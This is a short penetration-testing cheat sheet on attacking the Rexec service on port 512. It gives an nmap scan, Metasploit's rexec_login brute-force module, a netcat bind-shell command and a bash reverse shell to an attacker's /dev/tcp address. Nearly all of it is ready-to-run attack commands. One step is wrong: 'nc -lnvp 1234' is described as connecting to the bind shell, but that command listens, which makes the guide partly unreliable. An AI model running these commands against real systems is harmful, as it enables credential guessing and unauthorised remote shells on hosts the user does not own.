Rexec - Port 512

It is a service that allows you to execute a command inside a host if you know valid credentials (username and password).

Become VeryLazyTech member! 🎁

Basic Info

It is a service that allows you to execute a command inside a host if you know valid credentials (username and password).

Default Port: 512

PORT    STATE SERVICE
512/tcp open  exec

Scanning for Hosts

Start by using Nmap to scan for hosts with port 512 open, which is the default port for Rexec:

nmap -sT -p 512 <target_ip_range>

This will help identify potential targets with the Rexec service running.

Brute-Forcing Credentials

Use Metasploit's auxiliary/scanner/rservices/rexec_login module to brute-force username and password combinations:

Load the module:

use auxiliary/scanner/rservices/rexec_login

Set the target and options, such as username and password files:

set RHOSTS <target_ip> 
set USER_FILE /path/to/usernames.txt 
set PASS_FILE /path/to/passwords.txt
run

This will attempt to find valid credentials, exploiting Rexec's clear-text password vulnerability.

Exploiting with Command Execution

Once credentials are obtained, use the rexec command to execute a backdoor command. For example, start a netcat listener:

rexec -l username -p password rhost "nc -l -p 1234 -e /bin/bash"

Then, connect to the backdoor:

nc -lnvp 1234

Alternatively, set up a reverse shell:

rexec -l username -p password rhost "bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'"

Last updated

Was this helpful?